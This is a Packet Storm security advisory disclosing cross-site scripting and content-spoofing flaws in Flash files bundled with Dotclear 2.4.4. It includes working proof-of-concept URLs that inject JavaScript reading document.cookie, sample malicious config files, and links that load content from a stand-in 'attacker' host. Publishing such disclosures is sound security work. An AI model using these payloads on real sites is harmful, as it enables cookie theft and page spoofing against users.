Dotclear 2.4.4 Cross Site Scripting / Content Spoofing

2013-04-13T00:00:00
ID PACKETSTORM:121291
Type packetstorm
Reporter MustLive
Modified 2013-04-13T00:00:00

Description

                                        
                                            `Hello list!  
  
These are Cross-Site Scripting and Content Spoofing vulnerabilities in  
Dotclear.  
  
CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf  
and player_mp3.swf.  
  
File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in  
Swfupload in November 2012 (http://securityvulns.ru/docs28759.html).  
  
SecurityVulns ID: 12719  
CVE: CVE-2012-3414  
  
File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV  
Player in August 2011 (http://securityvulns.ru/docs26894.html).  
  
SecurityVulns ID: 11877  
  
File player_mp3.swf it's mp3 player similar to FLV Player (made by the same  
developer).  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions.  
  
In version Dotclear 2.5 the developers fixed vulnerabilities but not  
effectively: 1) all three vulnerable flash-files are exist in engine (so no  
need to take them from repository or from web sites for using in own  
projects, since these are vulnerable versions of flashes); 2) the developers  
changed swfupload.swf in Dotclear 2.5 on previous version, but this one is  
still vulnerable to all XSS and CS holes; 3) for of direct access to  
flash-files (via .htaccess), to prevent using of their vulnerabilities,  
works only in Apache, but not in other web servers (so web sites on them are  
vulnerable).  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Cross-Site Scripting (WASC-08):  
  
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E  
  
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)  
  
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml  
  
File xss.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<config>  
<param name="onclick" value="javascript:alert(document.cookie)" />  
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />  
</config>  
  
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt  
  
File xss.txt:  
  
onclick=javascript:alert(document.cookie)  
ondoubleclick=javascript:alert(document.cookie)  
  
Code will execute after click. It's strictly social XSS.  
  
Content Spoofing (WASC-12):  
  
http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E  
  
It's possible to inject text, images and html (e.g. for link injection).  
  
http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml  
  
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt  
  
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv  
  
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml  
  
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt  
  
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3  
  
------------  
Timeline:  
------------   
  
2013.01.10 - announced at my site.  
2013.01.14 - informed developers about vulnerabilities in all three flashes.  
2013.03.16 - released Dotclear 2.5.  
2013.04.10-12 - wrote 4 additional letters to developers with reminding,  
with drawing attention on ineffective fixing of the holes and with  
persuading them to fix the holes correctly.  
2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`